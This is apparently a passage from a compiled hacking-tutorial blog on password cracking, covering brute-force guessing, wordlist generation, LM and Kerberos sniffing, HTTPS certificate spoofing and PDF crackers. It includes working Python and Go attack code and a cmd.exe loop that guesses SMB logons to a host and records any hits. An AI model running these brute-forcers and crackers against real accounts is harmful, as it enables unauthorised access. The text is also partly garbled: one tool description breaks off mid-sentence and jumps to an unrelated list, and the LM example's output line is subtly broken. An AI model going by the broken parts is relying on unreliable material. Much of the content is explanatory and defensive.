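    def log_message(self, *args):  # keep the demo quiet
        pass

    def do_GET(self):
        if self.path != "/basic":
            self.send_error(404)
            return
        hdr = self.headers.get("Authorization", "")
        user = pw = None
        if hdr.startswith("Basic "):
            try:
                user, _, pw = base64.b64decode(hdr[6:]).decode().partition(":")
            except (ValueError, UnicodeDecodeError):
                pass
        if user is not None and VALID.get(user) == pw:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"welcome")
            return
        self.send_response(401)  # wrong or missing credentials: challenge again
        self.send_header("WWW-Authenticate", 'Basic realm="intranet"')
        self.end_headers()

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        form = urllib.parse.parse_qs(body.decode(errors="replace"))
        user = form.get("username", [""])[0]
        pw = form.get("password", [""])[0]
        if self.path == "/login" and VALID.get(user) == pw:
            self.send_response(302)  # success: redirect into the application
            self.send_header("Location", "/home")
        else:
            self.send_response(200)  # failure: the form is simply shown again
        self.end_headers()


def start_target():
    srv = HTTPServer(("127.0.0.1", 0), Target)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_port


class NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):  # surface the 302, don't follow it
        return None


# ProxyHandler({}) keeps any http_proxy in the environment out of the loop.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}), NoRedirect)


def status_of(req):
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as e:
        return e.code


def guess_basic(url, users, passwords):
    """Basic auth: 401 means wrong, any 2xx means the pair is valid."""
    for u in users:
        for p in passwords:
            token = base64.b64encode(("%s:%s" % (u, p)).encode()).decode()
            req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
            if 200 <= status_of(req) < 300:
                return u, p
    return None


def guess_form(url, users, passwords, success_status=302):
    """Form login: key on the response that only a successful login produces."""
    for u in users:
        for p in passwords:
            data = urllib.parse.urlencode({"username": u, "password": p}).encode()
            req = urllib.request.Request(url, data=data, method="POST")
            if status_of(req) == success_status:
                return u, p
    return None


if __name__ == "__main__":
    srv, base = start_target()
    print("basic:", guess_basic(base + "/basic", ["root", "admin"], ["password", "admin123"]))
    print("form: ", guess_form(base + "/login", ["admin"], ["admin", "admin123"]))
    srv.shutdown()
```

Nothing here throttles or rotates users, which is deliberate for a demo but is precisely what triggers the lockouts (event 539) and failed-logon bursts that the countermeasures above are meant to catch; a real engagement iterates passwords across users rather than users across passwords, and stops well below the lockout threshold.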

    Hacking Tool: PassList

    PassList is another character-based password generator.
    PassList implements a small routine that automates the task of creating a "passlist.txt" file for any brute force tool. The program does not require much information to work. It allows the user to specify the generation of passwords based on any given parameter: for instance, if the user knows that the target system's password starts with a particular phrase or number, he can specify this, which makes the list more meaningful to the user and easier for the brute forcer. He can also specify the length required, such as the maximum number of random characters per password, apart from the maximum number of random

    A partial list is given below.
    • Refiner is used to generate a wordlist containing all possible combinations of a partial password, which an attacker may have obtained by other means. Refiner will then generate a text file containing all possible combinations.
    • WeirdWordz lets the user select an input file and an output file, and writes all sorts of combinations of the lines/words in the input file to the output.
    • Raptor 1.4.6 - creates words using many different filters from html files to create a wordlist.
    • PASS-PARSE V1.2 - Pass-parse will take any file and turn all the words into a standard type password list, while stripping anything that's not alphanumeric. The main idea behind it is that while trying to crack the password of a personal website, the password may appear on the site when the person describes their interests. This will parse through an html file and create a list of words from that page to try as passwords.
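An added Python example (not PassList, Refiner, WeirdWordz or PASS-PARSE themselves) of the generators described in this section and of the hybrid attack described earlier: case and reversal variants with appended digits and symbols, Refiner-style expansion of a partially known password, and PASS-PARSE-style harvesting of candidate words from an HTML page. The rule set and the sample HTML are this example's own.

```python
import itertools
import re
import string


def case_variants(word):
    """As typed, lower, UPPER and Capitalized (duplicates collapse in the set)."""
    return {word, word.lower(), word.upper(), word.capitalize()}


def hybrid_variants(word, max_digits=2, symbols="!@#$"):
    """The hybrid attack: each case/reversal variant, plus appended digits or a symbol."""
    out = set()
    for base in case_variants(word) | case_variants(word[::-1]):
        out.add(base)
        for n in range(1, max_digits + 1):
            for digits in itertools.product(string.digits, repeat=n):
                out.add(base + "".join(digits))
        for sym in symbols:
            out.add(base + sym)
    return out


def refine(partial, charset=string.ascii_lowercase + string.digits):
    """Refiner-style: every fill of the '?' positions in a partly known password."""
    slots = [i for i, c in enumerate(partial) if c == "?"]
    for combo in itertools.product(charset, repeat=len(slots)):
        chars = list(partial)
        for i, c in zip(slots, combo):
            chars[i] = c
        yield "".join(chars)


def words_from_html(html, min_len=3):
    """PASS-PARSE-style: strip tags, keep alphanumeric tokens, dedupe in order."""
    text = re.sub(r"<[^>]+>", " ", html)
    seen, out = set(), []
    for tok in re.findall(r"[A-Za-z0-9]+", text):
        if len(tok) >= min_len and tok not in seen:
            seen.add(tok)
            out.append(tok)
    return out


def build_passlist(seed_words, **rules):
    """Everything a brute forcer would read from passlist.txt, sorted and unique."""
    out = set()
    for w in seed_words:
        out |= hybrid_variants(w, **rules)
    return sorted(out)


# Constructed page fragment, as if harvested from a target's personal site.
SAMPLE_HTML = ("<html><body><h1>About me</h1><p>I love my dog Rex and the "
               "Lakers since 2005.</p></body></html>")

if __name__ == "__main__":
    seeds = words_from_html(SAMPLE_HTML)
    print(len(build_passlist(seeds)), "candidates from", seeds)
    print(list(refine("pa??word", charset="s")))
```

Six base forms of one word times a hundred and fifteen suffixes is 690 candidates, which is why a hybrid list grows fast and why the page's advice to throttle failed logons matters: the generator is cheap, the attempts are the expensive part.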

    Web Based Password Cracking Techniques

    Passport authentication messages are passed in the form of electronic "tickets" that are used to inform the site that the user has signed in successfully. A ticket is a small amount of data that indicates the time the sign in occurred, when the user last manually signed in, and other information that is useful to the authentication process. Within the Passport system, these tickets take the form of cookies.

    To obtain a ticket, a user with a Passport account signs in to the site or tries to access a protected Web page within the merchant site (e.g., a page that requires user authentication before allowing access). This redirects the user to a special page on Passport.com. This page takes information that the merchant site has appended to the URL and processes it. This allows the Passport service to know which merchant site has referred the user, and which merchant site to return the user to. Once the information has been processed, Passport redirects the user to a page on Passport.net.

    Once the user enters their credentials, they are sent back to the Passport.com domain. Once there and verified, Passport writes a cookie to the user's browser that stores information about this sign-in. This is called a "ticket-granting cookie" and it is used in subsequent sign-in attempts. Then Passport redirects the user back to the merchant site.

    When the user arrives back at the merchant site, they bring two encrypted packets of information attached to the query string. Software called the Passport Manager which is installed on the merchant's authenticating servers reads those packets and writes them as encrypted cookies in the merchant site domain.

    The first cookie contains the authentication ticket information. The second contains any profile information that the user has chosen to share, and any operational information and unique identifiers that need to be passed. These packets are encrypted with a unique secret key that is shared between Passport and the merchant site. This helps to ensure that only the merchant can decode these messages.

    The merchant site then takes this information and uses it to issue its own cookies. Since these cookies are issued from the merchant's domain, the merchant has access to them. The merchant can use the Passport User ID to look the user up in its own database and perform authorization.

    When the user navigates to another Passport participating site, the new site has several choices to make about how they will authenticate this user. When the user clicks the sign in button, they are directed to the Passport service exactly as they were at their first sign in. The difference is that this time there is a ticket-granting-cookie saved on the browser that Passport can read.

    Since the ticket records the time it was issued, the referring site decides how "fresh" the ticket must be before it will accept it. If the ticket meets the rules the referring site has chosen, the user is redirected back to the referring site with the encrypted ticket and profile data; if the ticket is too old, the user is prompted to re-enter their credentials.


    However, Passport has been plagued with security issues, from reuse of cached authentication to privacy concerns. On top of that, the classes of exploit that plague Microsoft-based web systems, such as Unicode exploits, cross-site scripting and cookie theft, cast more than a shadow of doubt on this means of authentication: whoever can steal the ticket cookie is, to the site, the user.

    A few links exploring these issues are given below:

    Forms-Based Authentication
    • It is a highly customizable authentication mechanism that uses an HTML form whose <form> and <input> tags delineate the fields in which users enter their username and password.

    • After the data is submitted over HTTP or SSL, it is evaluated by server-side logic; if the credentials are valid, a cookie is given to the client to be reused on subsequent visits.

    • Forms-based authentication is the most popular authentication technique on the internet.

    Conventionally, web applications have users authenticate themselves through a web form. The credentials captured by this form are submitted to the business logic, which determines the authorization level. If the user is authenticated, the application generates a cookie or session variable. This cookie can hold anything from a session identifier or access token to customized personalization values. Both the period for which the cookie is valid and the contents stored in it carry security risk: a long-lived ticket can be replayed, and a predictable or unsigned one can be forged.

    Forms Authentication is a system in which unauthenticated requests are redirected to a web form where the unauthenticated users are required to provide their credentials. In the context of ASP.NET, it extends similar logic into its architecture as an authentication facility, Forms Authentication. Forms Authentication is one of three authentication providers. Windows Authentication and Passport Authentication make up the other two providers.

    Returning to the web-based authentication method: once the application has verified the credentials entered by the user, it issues an authorization ticket in the form of a cookie. In essence, Forms Authentication wraps the web application in a login user interface and a verification process.


    Forms Authentication Flow

    • A client generates a request for a protected resource (e.g. a transaction details page).

    • IIS (Internet Information Server) receives the request. If Anonymous Access is enabled, the client is passed on to the web application by default; otherwise IIS authenticates the client with Windows credentials first (prompting for them if necessary) and passes the request on only if that succeeds.

    • If the client does not present a valid authentication ticket/cookie, the web application redirects it to the login URL, where the user is prompted to enter credentials for the secure resource.

    • Once credentials are supplied, the web application authenticates the user and determines the authorization level of the request. If the client is authorized to access the secure resource, an authentication ticket is issued to the client (as a cookie) and presented on subsequent requests; if authentication fails, the client is usually returned an Access Denied message.
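    Both flows above end the same way: the site hands the client a signed, timestamped ticket and checks it on every later request. As an added example (not code from the original post, and not the Passport or ASP.NET ticket format), here is that issue-and-verify pair in Go. The ticket layout, the HMAC-SHA256 seal and the 15-minute freshness window are assumptions chosen for illustration; the secret and sample user are constructed.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/hex"
	"errors"
	"fmt"
	"strconv"
	"strings"
	"time"
)

// Ticket layout (assumed for this example, not a real product's format):
// base64url("user|unixIssueTime") + "." + hex(HMAC-SHA256 over the payload).
// The HMAC uses a secret only the issuing site knows, so a client can read
// the ticket but cannot forge one or edit the one it has.

func sign(payload, secret []byte) string {
	mac := hmac.New(sha256.New, secret)
	mac.Write(payload)
	return hex.EncodeToString(mac.Sum(nil))
}

// IssueTicket is what the site does once the credentials have been verified:
// record who signed in and when, and seal that record with the secret.
func IssueTicket(user string, issuedAt time.Time, secret []byte) string {
	payload := []byte(user + "|" + strconv.FormatInt(issuedAt.Unix(), 10))
	return base64.RawURLEncoding.EncodeToString(payload) + "." + sign(payload, secret)
}

// VerifyTicket is the check run on every later request. It returns the user
// name only if the MAC matches and the ticket is no older than maxAge, the
// "freshness" rule the relying site chooses; anything else forces a new sign in.
func VerifyTicket(ticket string, secret []byte, now time.Time, maxAge time.Duration) (string, error) {
	dot := strings.LastIndex(ticket, ".")
	if dot < 0 {
		return "", errors.New("malformed ticket")
	}
	payload, err := base64.RawURLEncoding.DecodeString(ticket[:dot])
	if err != nil {
		return "", errors.New("malformed ticket")
	}
	// Constant-time comparison: a plain == would leak how many MAC bytes matched.
	if !hmac.Equal([]byte(sign(payload, secret)), []byte(ticket[dot+1:])) {
		return "", errors.New("bad signature: ticket forged or tampered with")
	}
	bar := strings.LastIndex(string(payload), "|")
	if bar < 0 {
		return "", errors.New("malformed ticket")
	}
	issued, err := strconv.ParseInt(string(payload[bar+1:]), 10, 64)
	if err != nil {
		return "", errors.New("malformed ticket")
	}
	if now.Sub(time.Unix(issued, 0)) > maxAge {
		return "", errors.New("ticket too old: prompt for credentials again")
	}
	return string(payload[:bar]), nil
}

func main() {
	secret := []byte("per-site shared secret") // constructed for the example
	t0 := time.Unix(1700000000, 0)
	ticket := IssueTicket("alice", t0, secret)
	fmt.Println("issued:", ticket)

	// Fresh ticket presented five minutes later: accepted.
	fmt.Println(VerifyTicket(ticket, secret, t0.Add(5*time.Minute), 15*time.Minute))
	// Same ticket an hour later: too old, the user must sign in again.
	fmt.Println(VerifyTicket(ticket, secret, t0.Add(time.Hour), 15*time.Minute))
	// Client swaps the user name but keeps the old MAC: rejected.
	forged := base64.RawURLEncoding.EncodeToString([]byte("administrator|1700000000")) +
		ticket[strings.LastIndex(ticket, "."):]
	fmt.Println(VerifyTicket(forged, secret, t0, 15*time.Minute))
}
```

    The point of the seal is the third case: the cookie lives on the client, so anything in it that is not covered by the MAC is attacker-controlled.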




    Hacking Tool: WinSSLMiM
    • http://www.securiteinfo.com/outils/WinSSLMiM.shtml

    • WinSSLMiM is an HTTPS man-in-the-middle attack tool. It includes FakeCert, a tool for making fake certificates.

    • It can be used to exploit the certificate chain vulnerability in Internet Explorer described below. The tool runs under Windows 9x/2000.

    • Usage:

      • FakeCert: fc -h

      • WinSSLMiM: wsm -h

    We have seen how digital certificates are used for authentication. Typically, the administrator of a web site opts to provide secure communication through SSL. To enable this, the administrator generates a key pair and a certificate and gets the certificate signed by a Certification Authority (CA). The certificate lists the host name of the secure web site in the Common Name (CN) field of the Distinguished Name. The CA verifies that the administrator legitimately controls the host named in the CN field, signs the certificate, and returns it:

    [CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.website.com]


    When a web browser receives the certificate, it should verify that the CN field matches the host it just connected to and that the certificate is signed by a CA it trusts. A man-in-the-middle attack should then be impossible, because an attacker cannot produce a certificate that carries the victim's host name and a valid CA signature. Signing authority is, however, often delegated to intermediate (more localized) authorities. In that case the administrator of www.website.com receives a chain of certificates from the intermediate authority:


    Attack Methods

    However, as far as IE is concerned, anyone holding a valid CA-signed certificate for any domain can mint a certificate for any other domain that IE will accept. The attacker first obtains an ordinary certificate for a domain he controls and has VeriSign sign it:

    [CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.attacker.com]

    Then he generates a certificate for whatever domain he wants and signs it with the key of his own CA-signed certificate, so the chain presented to the browser becomes:

    [CERT - Issuer: VeriSign / Subject: VeriSign] -> [CERT - Issuer: VeriSign / Subject: www.attacker.com] -> [CERT - Issuer: www.attacker.com / Subject: www.amazon.com]

    Because IE did not check the Basic Constraints extension on the www.attacker.com certificate (an ordinary end-entity certificate, which does not assert CA:TRUE), it accepted this chain as valid for www.amazon.com. A correct validator requires CA:TRUE on every certificate that signs another one, not just a valid signature at each link. The upshot was that anyone with any CA-signed certificate and its private key could impersonate any other site, and any of the standard connection hijacking techniques could be combined with this flaw to mount a working man-in-the-middle attack.
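    The chain above, built and checked both ways, as an added example in Go (not the page's own code and not WinSSLMiM or FakeCert). It issues a root, an ordinary server certificate for www.attacker.com and a www.amazon.com certificate signed with the attacker's key, then runs the flawed check (signatures and host name only) beside the correct one (crypto/x509 path validation, which enforces Basic Constraints). The names, serial numbers and ECDSA keys are constructed for the example; the certificates of the day were RSA, which changes nothing about the check.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// CertWithKey pairs a parsed certificate with the private key behind it.
type CertWithKey struct {
	Cert *x509.Certificate
	Key  *ecdsa.PrivateKey
}

// issue creates a certificate for cn. With parent == nil it is self-signed
// (the root); otherwise it is signed by the parent's key. isCA sets the Basic
// Constraints extension, which is the field the flawed client ignored.
func issue(cn string, isCA bool, serial int64, parent *CertWithKey) *CertWithKey {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(serial),
		Subject:               pkix.Name{CommonName: cn},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(24 * time.Hour),
		BasicConstraintsValid: true,
		IsCA:                  isCA,
	}
	if isCA {
		tmpl.KeyUsage = x509.KeyUsageCertSign
	} else {
		tmpl.DNSNames = []string{cn} // server certificate: name goes in the SAN
	}
	parentCert, signer := tmpl, key
	if parent != nil {
		parentCert, signer = parent.Cert, parent.Key
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parentCert, &key.PublicKey, signer)
	if err != nil {
		panic(err)
	}
	cert, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return &CertWithKey{Cert: cert, Key: key}
}

// BuildSpoofChain reproduces the chain from the text: the root CA issues a
// normal (non-CA) server certificate to www.attacker.com, and the attacker
// then uses that certificate's key to sign one for www.amazon.com.
func BuildSpoofChain() (root, attacker, spoof *CertWithKey) {
	root = issue("VeriSign", true, 1, nil)
	attacker = issue("www.attacker.com", false, 2, root)
	spoof = issue("www.amazon.com", false, 3, attacker)
	return
}

// NaiveVerify models the flawed client: it checks that the leaf carries the
// host name and that every signature in the chain is valid, but never asks
// whether the signer was allowed to act as a CA. It accepts the spoofed chain.
func NaiveVerify(leaf *x509.Certificate, chain []*x509.Certificate, host string) error {
	if err := leaf.VerifyHostname(host); err != nil {
		return err
	}
	cur := leaf
	for _, parent := range chain {
		if err := parent.CheckSignature(cur.SignatureAlgorithm, cur.RawTBSCertificate, cur.Signature); err != nil {
			return err
		}
		cur = parent
	}
	return nil
}

// StrictVerify is the correct check: standard path validation rejects any
// intermediate whose Basic Constraints do not say CA:TRUE.
func StrictVerify(leaf *x509.Certificate, intermediates []*x509.Certificate, root *x509.Certificate, host string) error {
	roots := x509.NewCertPool()
	roots.AddCert(root)
	inters := x509.NewCertPool()
	for _, c := range intermediates {
		inters.AddCert(c)
	}
	_, err := leaf.Verify(x509.VerifyOptions{DNSName: host, Roots: roots, Intermediates: inters})
	return err
}

func main() {
	root, attacker, spoof := BuildSpoofChain()
	chain := []*x509.Certificate{attacker.Cert, root.Cert}
	fmt.Println("naive verifier :", NaiveVerify(spoof.Cert, chain, "www.amazon.com"))
	fmt.Println("strict verifier:", StrictVerify(spoof.Cert, chain[:1], root.Cert, "www.amazon.com"))
}
```

    The naive verifier prints no error; the strict one refuses the chain because www.attacker.com is not authorized to sign certificates, which is exactly the missing check.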




    ---Regards,
    Amarjit Singh

    Free Online PDF Password Cracker: How to Crack PDF Passwords

    Yesterday I received an email from one of our readers. He was asking me to crack a password-protected PDF file. As we know, if a PDF is password protected, we cannot do much with it. Sometimes we cannot even take printouts. Viewable mode has very limited access. I searched a lot on the internet and found many tools. I cracked a few of them and tried them in my testing lab. But I was not happy... WHY??

    The reason was that I cannot always keep the laptop with me. Such a password-cracking requirement can come up any time, anywhere. So I started googling again. This time I concentrated only on ONLINE PDF PASSWORD CRACKING, ABSOLUTELY FREE. During my 7 minutes of searching on Google, I came across a very interesting site which I would like to share with you guys.

    Welcome to FreeMyPDF.com!

    Use this site to remove passwords and restrictions (such as printing, copying text, etc.) from PDFs.

    Note: This only works for PDFs that you can open and read without any 3rd-party plugins. PDFs that require a password to be viewed cannot be unlocked by this service.
    This is because this is not cracking. Viewable PDFs with restrictions are not really protected, no more than a door with a broken lock, as opposed to password-protected PDFs.

    Wednesday, July 20, 2011

    Manual Password Cracking Algorithm

    • Find a valid user

    • Create a list of possible passwords

    • Rank the passwords from high probability to low

    • Key in each password

    • If the system allows you in - Success

    • Else try the next candidate until success (mind the account lockout policy: too many failures in a row can lock the account and turn guessing into a denial of service)

    In its simplest form, password guessing can be automated with a FOR loop. In the example below, an attacker creates a text file of username/password pairs and iterates over it with a cmd.exe FOR loop, attempting an SMB session to the victim with each pair.

    A text file is created to serve as a dictionary from which the main FOR loop will draw usernames and passwords as it iterates through each line:

    [file: credentials.txt]
    administrator ""
    administrator password
    administrator administrator
    [Etc.]

    From a directory that can access the text file, the following is typed at a cmd.exe prompt (the trailing ^ continues the command on the next line, which is why cmd shows the More? prompt; in a batch file the loop variables are written %%i and %%j). Standard error is redirected to nul so failed attempts print nothing, and the && clauses only run when net use succeeds:

    c:\>FOR /F "tokens=1,2*" %i in (credentials.txt)^
    More? do net use \\victim.com\IPC$ %j /u:victim.com\%i^
    More? 2>>nul^
    More? && echo %time% %date% >> outfile.txt^
    More? && echo \\victim.com acct: %i pass: %j >> outfile.txt
    c:\>type outfile.txt

    If any username/password pair from credentials.txt was guessed correctly, outfile.txt will exist and contain the correct user name and password. The attacker's system will also have an open session with the victim server (net use \\victim.com\IPC$ /delete closes it). Every attempt is logged on the server side as a failed or successful logon, so this is noisy.

    ---Regards,
    Amarjit Singh

    Password Sniffing: How to sniff passwords from LAN

    Password Sniffing

    Password guessing is hard work. Why not just sniff credentials off the wire as users log in to a server and then replay them to gain access?

    On a shared-medium network (a hub-based Ethernet segment or a wireless LAN) every frame sent by any host reaches every other host on the segment. Normally a network card discards frames whose destination MAC address is not its own, so every host except the intended recipient ignores the message. A host running a sniffer puts its card into promiscuous mode and keeps every frame, scanning the traffic for passwords and other sensitive information. If a user logs in to a server across the network while the attacker's system is sniffing, the attacker captures the login exchange, including the user name and whatever form the password takes on the wire, and can then log in to the target as that user and compromise it further. This technique is called password sniffing. On a switched network the attacker first has to get into the traffic path, for example by ARP spoofing, before the same capture works.

    This is a serious threat to users, such as remote users, who log in to computers from remote sites: a remote user's password is only as secure as the network used to reach the remote computer.

    Hacking Tool: L0phtCrack

    • LC4 is a password auditing and recovery package distributed by @stake. Its SMB packet capture listens on the local network segment and captures individual login sessions.

    • With the L0phtCrack cracking engine, anyone who can sniff the wire for an extended period is almost guaranteed to obtain Administrator credentials within a matter of days.

    Windows systems built on the LAN Manager networking protocols authenticate with a challenge/response exchange: the client does not send the password itself but a 24-byte response computed from its LM password hash and an 8-byte challenge issued by the server. The server recomputes the response from the hash it stores for that account, and a match authenticates the client. The problem lay in the weak hash algorithm: the password is converted to uppercase (eliminating case sensitivity), padded to 14 characters and split into two 7-character halves that are hashed independently. An attacker therefore never has to crack more than seven characters at a time, a far smaller search space, and a short password gives itself away because its empty second half hashes to a well-known constant. That weak hash, combined with its exposure on the wire in the challenge/response exchange, made LM-based systems highly susceptible to password interception and brute-force attack with L0phtCrack.

    Windows NT introduced a case-sensitive hash to strengthen passwords, but kept LM authentication alongside the NTLM scheme for backward compatibility with LAN Manager-based systems. As a result both hashes were stored in the password database and both responses were sent across the network during authentication. L0phtCrack captures the exchange, cracks the much simpler LM response first, and then tries case variations of the recovered uppercase password against the NT hash to resolve the remaining differences.
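    The LM hash and challenge/response just described, carried through as an added example in Go (not the page's own code and not L0phtCrack's). It computes the LM hash, derives the 24-byte response a client sends for a given server challenge, and then does what a sniffer-fed cracker does: replays wordlist candidates against a captured challenge/response pair offline. The challenge, the password and the wordlist are constructed for the example.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// lmDESKey spreads a 7-byte LM key half over the 8 bytes DES expects; the
// low bit of each byte is a parity bit that DES does not use.
func lmDESKey(half []byte) []byte {
	k := make([]byte, 8)
	k[0] = half[0]
	k[1] = half[0]<<7 | half[1]>>1
	k[2] = half[1]<<6 | half[2]>>2
	k[3] = half[2]<<5 | half[3]>>3
	k[4] = half[3]<<4 | half[4]>>4
	k[5] = half[4]<<3 | half[5]>>5
	k[6] = half[5]<<2 | half[6]>>6
	k[7] = half[6] << 1
	return k
}

// desBlock encrypts one 8-byte block under a 7-byte LM key.
func desBlock(key7, block []byte) []byte {
	c, err := des.NewCipher(lmDESKey(key7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// LMHash: uppercase the password, cut or zero-pad it to 14 bytes, split it
// into two 7-byte halves and use each half as a DES key to encrypt the
// constant "KGS!@#$%". Each half is hashed on its own, so an attacker cracks
// two 7-character pieces, never one 14-character password.
func LMHash(password string) []byte {
	p := []byte(strings.ToUpper(password))
	if len(p) > 14 {
		p = p[:14]
	}
	p = append(p, make([]byte, 14-len(p))...)
	magic := []byte("KGS!@#$%")
	return append(desBlock(p[:7], magic), desBlock(p[7:], magic)...)
}

// LMResponse is what actually crosses the wire: the 16-byte hash padded with
// five zero bytes gives three 7-byte DES keys, each of which encrypts the
// server's 8-byte challenge, for 24 bytes in total.
func LMResponse(hash, challenge []byte) []byte {
	padded := append(append([]byte{}, hash...), make([]byte, 5)...)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, desBlock(padded[i*7:(i+1)*7], challenge)...)
	}
	return resp
}

// CrackCapture is the sniffer's side of it: with the challenge and response
// taken off the network, try each wordlist entry until one reproduces the
// response. The server is never contacted, so lockout policies never fire.
func CrackCapture(challenge, response []byte, wordlist []string) (string, bool) {
	for _, w := range wordlist {
		if bytes.Equal(LMResponse(LMHash(w), challenge), response) {
			return w, true
		}
	}
	return "", false
}

func main() {
	fmt.Printf("LM(\"password\") = %X\n", LMHash("password"))
	// A password of seven characters or fewer leaves the second half empty,
	// so its last 8 bytes are always the same well-known constant.
	fmt.Printf("LM(\"abc\")      = %X\n", LMHash("abc"))

	// Constructed capture: the server's challenge and the client's response.
	challenge := []byte{0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef}
	response := LMResponse(LMHash("Secret7"), challenge)
	fmt.Printf("response       = %X\n", hex.EncodeToString(response))
	// The wordlist entry is lower case; LM's uppercasing makes it match anyway.
	fmt.Println(CrackCapture(challenge, response, []string{"letmein", "admin", "secret7"}))
}
```

    The cracker cannot tell "Secret7" from "secret7" because LM discarded the case before hashing, which is the gap L0phtCrack closes afterwards by testing case variations against the NT hash.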

    Hacking Tool: KerbCrack

    • KerbCrack consists of two programs, kerbsniff and kerbcrack. The sniffer listens on the network and captures Windows 2000/XP Kerberos logins. The cracker can be used to find the passwords from the capture file using a bruteforce attack or a dictionary attack.

    KerbCrack demonstrates the possibility of obtaining user passwords by simply listening to the initial Kerberos logon exchange. Let us explore how this can also be vulnerable to brute force attacks.

    In general, an authentication protocol built on encryption, such as Kerberos, can be circumvented in four ways:

    • The attacker steals the key, by whatever means possible.

    • The attacker finds a flaw in the vendor's implementation of the protocol.

    • The attacker finds a flaw in the protocol itself, which is unlikely for a well-studied protocol.

    • The attacker tries candidate keys by brute force. This is a real possibility here: in the initial logon exchange the client sends pre-authentication data, a timestamp encrypted under a key derived from the user's password, so a captured exchange gives an offline test against which password guesses can be checked without ever talking to the server again. That is what kerbcrack does with kerbsniff's capture file, by dictionary or exhaustive search.

    ---Regards,
    Amarjit Singh

    Portable PDF Password Cracker: Crack PDF Passwords

    Portable PDF Password Cracker Enterprise v3.2 | 9.19 MB

    PDF Password Cracker is a utility to remove the security from PDF documents (you should, of course, have the right to do so, for example in the case of a forgotten user/owner password). Only the standard PDF security handler is supported; neither third-party plug-ins nor e-books. Both protection methods are handled:

    1. Restrictions on the file (printing, copying and so on) can be removed instantly, for any Acrobat version up to 8.x.
    2. It can also decrypt files whose password you know.

    Support PDF 1.7 (Acrobat 8.x) files, including 40-bit RC4 decryption, 128-bit RC4 decryption and AES decryption
    Instantly remove restrictions on copying, printing and other actions with the file
    Do NOT need Adobe Acrobat software
    Please note that PDF Password Cracker does not work with documents that have a user-level password (preventing the file from being opened) when both the user and owner passwords are unknown, nor with PDF files protected by any 3rd-party security plug-in such as FileOpen.

    Key Features
    New PDF 1.7 (Acrobat 8.x) files support, including 64bit and 128bit RC4 decryption
    Support AES decryption
    Confidentiality (you crack your secret files, not someone from cracking service)
    All versions through Adobe Acrobat 8.0 are supported
    Decrypt PDF files protected with owner passwords
    Instantly remove restrictions on copying, printing and other actions with the file
    Full install/uninstall support
    Support drag and drop PDF files
    Do NOT need Adobe Acrobat software
    Support Windows 98, ME, NT, 2000, XP, 2003, Vista systems
    Support PDF1.7 (Acrobat 8.x) files, including 40-bit RC4 decryption, 128-bit RC4 decryption and AES decryption
    Decryption, compressed files and unencrypted metadata
    Decrypt protected Adobe Acrobat PDF files, removing restrictions on printing, editing, copying

    Homepage - http://www.crackpdf.com/